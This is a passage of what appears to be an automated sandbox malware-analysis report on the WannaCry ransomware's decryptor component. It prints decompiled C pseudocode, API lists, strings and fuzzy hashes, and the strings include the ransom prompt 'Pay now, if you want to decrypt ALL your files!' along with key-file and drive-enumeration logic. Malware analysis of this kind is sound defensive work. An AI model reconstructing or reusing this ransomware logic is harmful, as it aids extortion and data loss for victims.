                                    • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                    • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
                                  • #2379.MFC42(?), ref: 004042FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
                                  • String ID: mailto:$open
                                  • API String ID: 1144735033-2326261162
                                  • Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                  • Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
                                  • Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                  • Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0040BAF0() {
                                  				signed int _t71;
                                  				signed int _t72;
                                  				void* _t84;
                                  				signed int _t86;
                                  				signed int _t91;
                                  				signed int _t92;
                                  				signed int _t97;
                                  				intOrPtr _t101;
                                  				signed int _t110;
                                  				void* _t113;
                                  				void* _t116;
                                  				signed int _t126;
                                  				char _t129;
                                  				signed int _t131;
                                  				unsigned int _t138;
                                  				signed int _t139;
                                  				char* _t144;
                                  				signed int _t147;
                                  				unsigned int _t152;
                                  				signed int _t153;
                                  				signed int _t158;
                                  				signed int _t160;
                                  				signed int _t161;
                                  				signed int _t172;
                                  				signed int _t173;
                                  				signed int _t181;
                                  				signed int _t191;
                                  				signed int _t198;
                                  				signed int _t199;
                                  				signed int _t200;
                                  				void* _t237;
                                  				char* _t238;
                                  				void* _t240;
                                  				void* _t241;
                                  				intOrPtr* _t242;
                                  				void* _t245;
                                  				intOrPtr* _t246;
                                  				signed int _t249;
                                  				intOrPtr* _t250;
                                  				intOrPtr _t251;
                                  				void* _t252;
                                  				void* _t255;
                                  				void* _t256;
                                  				void* _t257;
                                  				void* _t259;
                                  				void* _t260;
                                  				void* _t262;
                                  				void* _t263;
                                  				void* _t264;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00414286);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t251;
                                  				_t252 = _t251 - 0x47c;
                                  				_t71 = E0040BA10();
                                  				if(_t71 != 0) {
                                  					L31:
                                  					_t72 = _t71 | 0xffffffff;
                                  					__eflags = _t72;
                                  				} else {
                                  					_t131 =  *0x422210;
                                  					 *((intOrPtr*)( *_t131 + 0xc))();
                                  					asm("repne scasb");
                                  					_t266 =  !(_t131 | 0xffffffff) == 1;
                                  					if( !(_t131 | 0xffffffff) == 1) {
                                  						L3:
                                  						_t249 = 0;
                                  						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
                                  						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
                                  						 *(_t252 + 0x1c) = 0;
                                  						asm("repne scasb");
                                  						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
                                  						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
                                  						 *((intOrPtr*)(_t252 + 0x498)) = 0;
                                  						_t139 = _t138 >> 2;
                                  						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
                                  						_t255 = _t252 + 0x18;
                                  						_t144 = _t255 + 0xa8;
                                  						_t238 = strtok(_t144, ",;");
                                  						_t256 = _t255 + 8;
                                  						if(_t238 != 0) {
                                  							_t129 =  *((intOrPtr*)(_t256 + 0x13));
                                  							do {
                                  								_t200 = _t249;
                                  								_t249 = _t249 + 1;
                                  								if(_t200 > 0) {
                                  									_t181 = _t256 + 0x28;
                                  									 *(_t256 + 0x28) = _t129;
                                  									E0040C7B0(_t181, 0);
                                  									asm("repne scasb");
                                  									_push( !(_t181 | 0xffffffff) - 1);
                                  									_push(_t238);
                                  									E0040C920(_t256 + 0x2c);
                                  									 *((char*)(_t256 + 0x4a0)) = 1;
                                  									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
                                  									_t144 = _t256 + 0x28;
                                  									 *((char*)(_t256 + 0x498)) = 0;
                                  									E0040C7B0(_t144, 1);
                                  								}
                                  								_t238 = strtok(0, ",;");
                                  								_t256 = _t256 + 8;
                                  							} while (_t238 != 0);
                                  						}
                                  						asm("repne scasb");
                                  						_t147 =  !(_t144 | 0xffffffff) - 1;
                                  						if(_t147 == 0) {
                                  							L17:
                                  							_push(_t256 + 0xa4);
                                  							_t84 = E0040BA60(_t277);
                                  							_t256 = _t256 + 4;
                                  							if(_t84 != 0) {
                                  								goto L19;
                                  							} else {
                                  								asm("repne scasb");
                                  								_t172 =  !(_t147 | 0xffffffff);
                                  								_t245 = _t256 + 0xa4 - _t172;
                                  								_t173 = _t172 >> 2;
                                  								memcpy(0x422214, _t245, _t173 << 2);
                                  								_t263 = _t256 + 0xc;
                                  								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
                                  								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
                                  								_t264 = _t263 + 0xc;
                                  								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
                                  								_push( *((intOrPtr*)(_t264 + 0x18)));
                                  								L00412C98();
                                  								_t252 = _t264 + 4;
                                  								_t72 = 0;
                                  							}
                                  						} else {
                                  							_t246 = _t256 + 0xa4;
                                  							_t116 = 0x422214;
                                  							while(1) {
                                  								_t198 =  *_t116;
                                  								_t147 = _t198;
                                  								if(_t198 !=  *_t246) {
                                  									break;
                                  								}
                                  								if(_t147 == 0) {
                                  									L14:
                                  									_t116 = 0;
                                  								} else {
                                  									_t199 =  *((intOrPtr*)(_t116 + 1));
                                  									_t147 = _t199;
                                  									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
                                  										break;
                                  									} else {
                                  										_t116 = _t116 + 2;
                                  										_t246 = _t246 + 2;
                                  										if(_t147 != 0) {
                                  											continue;
                                  										} else {
                                  											goto L14;
                                  										}
                                  									}
                                  								}
                                  								L16:
                                  								_t277 = _t116;
                                  								if(_t116 == 0) {
                                  									L19:
                                  									srand(GetTickCount());
                                  									_t86 =  *(_t256 + 0x20);
                                  									_t257 = _t256 + 4;
                                  									__eflags = _t86;
                                  									if(_t86 <= 0) {
                                  										L30:
                                  										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
                                  										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
                                  										_push( *((intOrPtr*)(_t257 + 0x18)));
                                  										L00412C98();
                                  										_t252 = _t257 + 4;
                                  										goto L31;
                                  									} else {
                                  										do {
                                  											_t191 = rand() % _t86;
                                  											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
                                  											__eflags = _t191;
                                  											_t91 = _t191;
                                  											if(_t191 > 0) {
                                  												_t91 = 0;
                                  												__eflags = 0;
                                  												do {
                                  													_t250 =  *_t250;
                                  													_t191 = _t191 - 1;
                                  													__eflags = _t191;
                                  												} while (_t191 != 0);
                                  											}
                                  											__eflags = _t91;
                                  											if(_t91 < 0) {
                                  												_t110 =  ~_t91;
                                  												do {
                                  													_t250 =  *((intOrPtr*)(_t250 + 4));
                                  													_t110 = _t110 - 1;
                                  													__eflags = _t110;
                                  												} while (_t110 != 0);
                                  											}
                                  											_t92 =  *(_t250 + 0xc);
                                  											_t42 = _t250 + 8; // 0x8
                                  											_t126 = _t42;
                                  											__eflags = _t92;
                                  											if(__eflags == 0) {
                                  												_t92 = 0x41ba38;
                                  											}
                                  											asm("repne scasb");
                                  											_t152 =  !(_t147 | 0xffffffff);
                                  											_t240 = _t92 - _t152;
                                  											_t153 = _t152 >> 2;
                                  											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
                                  											_t259 = _t257 + 0x18;
                                  											_t158 = _t259 + 0x40;
                                  											_push(_t158);
                                  											_t97 = E0040BA60(__eflags);
                                  											_t260 = _t259 + 4;
                                  											__eflags = _t97;
                                  											if(_t97 == 0) {
                                  												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
                                  												asm("repne scasb");
                                  												_t160 =  !(_t158 | 0xffffffff);
                                  												_t241 = _t260 + 0x40 - _t160;
                                  												_t161 = _t160 >> 2;
                                  												memcpy(0x422214, _t241, _t161 << 2);
                                  												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
                                  												_t262 = _t260 + 0x18;
                                  												_t242 =  *((intOrPtr*)(_t262 + 0x18));
                                  												_t101 =  *_t242;
                                  												__eflags = _t101 - _t242;
                                  												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
                                  												if(_t101 != _t242) {
                                  													do {
                                  														_push(0);
                                  														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
                                  														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
                                  													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
                                  												}
                                  												_push( *((intOrPtr*)(_t262 + 0x18)));
                                  												L00412C98();
                                  												_t252 = _t262 + 4;
                                  												_t72 = 0;
                                  											} else {
                                  												goto L29;
                                  											}
                                  											goto L32;
                                  											L29:
                                  											 *((intOrPtr*)( *( *0x422210) + 0xc))();
                                  											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
                                  											_t147 = _t126;
                                  											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
                                  											E0040CE50(_t147, 0);
                                  											_push(_t250);
                                  											L00412C98();
                                  											_t257 = _t260 + 4;
                                  											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
                                  											Sleep(0xbb8);
                                  											_t86 =  *(_t257 + 0x1c);
                                  											__eflags = _t86;
                                  										} while (_t86 > 0);
                                  										goto L30;
                                  									}
                                  								} else {
                                  									goto L17;
                                  								}
                                  								goto L32;
                                  							}
                                  							asm("sbb eax, eax");
                                  							asm("sbb eax, 0xffffffff");
                                  							goto L16;
                                  						}
                                  					} else {
                                  						_push(0x422214);
                                  						_t72 = E0040BA60(_t266);
                                  						_t252 = _t252 + 4;
                                  						if(_t72 != 0) {
                                  							goto L3;
                                  						}
                                  					}
                                  				}
                                  				L32:
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
                                  				return _t72;
                                  			}


                                  APIs
                                  • strtok.MSVCRT ref: 0040BBA9
                                  • strtok.MSVCRT ref: 0040BC22
                                  • #825.MFC42(?,?), ref: 0040BCDD
                                  • GetTickCount.KERNEL32 ref: 0040BCEC
                                  • srand.MSVCRT ref: 0040BCF3
                                  • rand.MSVCRT ref: 0040BD09
                                  • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
                                  • Sleep.KERNEL32(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
                                  • #825.MFC42(?,?,?,?), ref: 0040BDED
                                    • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
                                  • #825.MFC42(?), ref: 0040BE7A
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825$strtok$CountSleepTickrandsrand
                                  • String ID:
                                  • API String ID: 1749417438-0
                                  • Opcode ID: 22053940df912021fb9a6cdb0f17ac6f6ca949f8e593908d0331f463cdce664a
                                  • Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
                                  • Opcode Fuzzy Hash: 22053940df912021fb9a6cdb0f17ac6f6ca949f8e593908d0331f463cdce664a
                                  • Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E004038F0(void* __ecx, void* __ebp) {
                                  				long _v4;
                                  				intOrPtr _v16;
                                  				char _v1252;
                                  				char _v1284;
                                  				void* __edi;
                                  				int _t20;
                                  				int _t23;
                                  				void* _t30;
                                  				long _t48;
                                  				void* _t50;
                                  				intOrPtr _t53;
                                  				void* _t54;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041367B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t53;
                                  				_t54 = _t53 - 0x4f8;
                                  				_t50 = __ecx;
                                  				E00403EB0( *[fs:0x0], __ecx, 0);
                                  				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
                                  				if(_t20 != 0xffffffff) {
                                  					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
                                  					_t57 =  *((intOrPtr*)(_t48 + 8));
                                  					if( *((intOrPtr*)(_t48 + 8)) == 0) {
                                  						E00403AF0(_t48, __ebp);
                                  					}
                                  					E00401E90( &_v1252, _t57);
                                  					_v4 = 0;
                                  					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
                                  					_t54 = _t54 + 0xc;
                                  					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
                                  						_t30 = E00403A20( &_v1252, _t48);
                                  						__eflags = _t30;
                                  						if(_t30 != 0) {
                                  							_push(0);
                                  							_push(0x40);
                                  							_push("All your files have been decrypted!");
                                  							goto L8;
                                  						}
                                  					} else {
                                  						if( *((intOrPtr*)(_t48 + 8)) == 0) {
                                  							_push(0);
                                  							_push(0x40);
                                  							_push("Pay now, if you want to decrypt ALL your files!");
                                  							L8:
                                  							L00412CC8();
                                  						}
                                  					}
                                  					_v4 = 0xffffffff;
                                  					_t20 = E00401F30( &_v1252);
                                  				}
                                  				E00403EB0(_t20, _t50, 1);
                                  				_t23 = CloseHandle( *(_t50 + 0xf4));
                                  				 *(_t50 + 0xf4) = 0;
                                  				 *[fs:0x0] = _v16;
                                  				return _t23;
                                  			}


                                  APIs
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
                                  • sprintf.MSVCRT ref: 0040397A
                                  • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
                                    • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
                                    • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
                                    • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
                                    • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                  • CloseHandle.KERNEL32(?,00000001), ref: 004039F1
                                  Strings
                                  • %08X.dky, xrefs: 00403969
                                  • All your files have been decrypted!, xrefs: 004039C3
                                  • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
                                  • String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
                                  • API String ID: 139182656-2046724789
                                  • Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                  • Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
                                  • Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                  • Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00404090(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t16;
                                  				intOrPtr _t34;
                                  				intOrPtr _t39;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413739);
                                  				_t16 =  *[fs:0x0];
                                  				_push(_t16);
                                  				 *[fs:0x0] = _t39;
                                  				_push(__ecx);
                                  				_t34 = __ecx;
                                  				_v16 = __ecx;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx)) = 0x415d70;
                                  				_v4 = 0;
                                  				L00412DA6();
                                  				_v4 = 1;
                                  				L00412DA6();
                                  				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
                                  				_push(0x421798);
                                  				_v4 = 3;
                                  				 *((intOrPtr*)(__ecx)) = 0x415cb0;
                                  				L00412DA0();
                                  				_push(_t16);
                                  				L00412D9A();
                                  				 *((char*)(__ecx + 0x5a)) = 0;
                                  				 *((char*)(__ecx + 0x58)) = 0;
                                  				 *((char*)(__ecx + 0x59)) = 0;
                                  				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
                                  				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
                                  				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
                                  				 *[fs:0x0] = _v20;
                                  				return _t34;
                                  			}










                                  APIs
                                  • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                  • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                  • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                  • #860.MFC42(00421798), ref: 004040F6
                                  • #858.MFC42(00000000,00421798), ref: 004040FE
                                  • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #540CursorLoad$#567#858#860
                                  • String ID: 0ZA
                                  • API String ID: 2440951079-2594568282
                                  • Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                  • Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
                                  • Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                  • Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00407CB0() {
                                  				char _v8;
                                  				intOrPtr _v16;
                                  				char _v28;
                                  				char _v40;
                                  				void* _v104;
                                  				void* _v168;
                                  				char _v260;
                                  				void* _v264;
                                  				char* _t24;
                                  				intOrPtr _t34;
                                  				intOrPtr* _t35;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413F77);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t34;
                                  				_t35 = _t34 - 0xfc;
                                  				E004030E0( &_v260, 0);
                                  				_v8 = 0;
                                  				L00412B72();
                                  				_v8 = 1;
                                  				_t24 =  &_v28;
                                  				_v28 = 0x415c00;
                                  				 *_t35 = _t24;
                                  				_v8 = 5;
                                  				L00412D52();
                                  				_v28 = 0x415bec;
                                  				 *_t35 =  &_v40;
                                  				_v40 = 0x415c00;
                                  				_v8 = 6;
                                  				L00412D52();
                                  				_v40 = 0x415bec;
                                  				_v8 = 2;
                                  				L00412D4C();
                                  				_v8 = 1;
                                  				L00412D3A();
                                  				_v8 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v16;
                                  				return _t24;
                                  			}















                                  APIs
                                    • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                    • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                    • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                  • #2514.MFC42 ref: 00407CE5
                                  • #2414.MFC42 ref: 00407D1A
                                  • #2414.MFC42 ref: 00407D4F
                                  • #616.MFC42 ref: 00407D6E
                                  • #693.MFC42 ref: 00407D7F
                                  • #641.MFC42 ref: 00407D93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#567$#2514#324#616#641#693
                                  • String ID: [A$[A
                                  • API String ID: 3779294304-353784214
                                  • Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                  • Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
                                  • Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                  • Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
                                  				char _v0;
                                  				char _v4;
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v32;
                                  				char _v34;
                                  				long _v36;
                                  				char _v40;
                                  				char _v48;
                                  				char _v56;
                                  				char _v64;
                                  				char _v65;
                                  				char _v68;
                                  				int _v76;
                                  				char _v77;
                                  				void* _t57;
                                  				signed int _t76;
                                  				struct HWND__* _t92;
                                  				long _t133;
                                  				struct _IO_FILE* _t136;
                                  				struct HWND__* _t138;
                                  				signed int _t140;
                                  				int _t141;
                                  				intOrPtr _t143;
                                  				void* _t144;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004142DB);
                                  				 *[fs:0x0] = _t143;
                                  				E00413060(0x240c, __ecx,  *[fs:0x0]);
                                  				_push(_t140);
                                  				E0040DBB0( &_v0, 0x1000);
                                  				_a9220 = 0;
                                  				_push( &_v4);
                                  				_t141 = _t140 | 0xffffffff;
                                  				_t57 = E0040BED0(_a9228, _a9232, 0xc);
                                  				_t144 = _t143 + 0x10;
                                  				if(_t57 == 0) {
                                  					_t138 = _a9272;
                                  					if(_t138 != 0) {
                                  						SendMessageA(_t138, 0x4e20, 0, 0);
                                  					}
                                  					_push(8);
                                  					_push(_a9240);
                                  					E0040DC00( &_v0);
                                  					_v12 = _a9236;
                                  					_push(4);
                                  					_push( &_v12);
                                  					E0040DC00( &_v8);
                                  					E0040DD00( &_v16, _a9240);
                                  					E0040DD00( &_v20, _a9240);
                                  					_push(1);
                                  					_push( &_v34);
                                  					_v34 = _a9240;
                                  					E0040DC00( &_v24);
                                  					_t133 = _a9220;
                                  					_push(4);
                                  					_push( &_v36);
                                  					_v36 = _t133;
                                  					E0040DC00( &_v32);
                                  					_push(_t133);
                                  					_push(_a9208);
                                  					E0040DC00( &_v40);
                                  					_push(0);
                                  					_push(E0040DD40( &_v48));
                                  					_push(E0040DD30( &_v48));
                                  					_push(7);
                                  					if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x18))() >= 0) {
                                  						if(_t138 != 0) {
                                  							SendMessageA(_t138, 0x4e21, 0, 0);
                                  						}
                                  						_push( &_v64);
                                  						_push( &_a4060);
                                  						_v64 = 0x13ec;
                                  						_push( &_v65);
                                  						if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x1c))() >= 0) {
                                  							if(_v77 == 7) {
                                  								_t141 = 0;
                                  								if(_v76 > 0) {
                                  									_t136 = fopen(_a9200, "wb");
                                  									_t144 = _t144 + 8;
                                  									if(_t136 != 0) {
                                  										fwrite( &_a4048, 1, _v76, _t136);
                                  										fclose(_t136);
                                  										_t144 = _t144 + 0x14;
                                  										_t141 = 1;
                                  									}
                                  								}
                                  							}
                                  							if(_t138 != 0) {
                                  								SendMessageA(_t138, 0x4e22, _t141, 0);
                                  							}
                                  							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
                                  							_a9156 = 0xffffffff;
                                  							L23:
                                  							E0040DBF0( &_v68);
                                  							_t76 = _t141;
                                  						} else {
                                  							if(_t138 != 0) {
                                  								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
                                  							}
                                  							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
                                  							_a9156 = 0xffffffff;
                                  							_t76 = E0040DBF0( &_v68) | 0xffffffff;
                                  						}
                                  						goto L24;
                                  					} else {
                                  						if(_t138 != 0) {
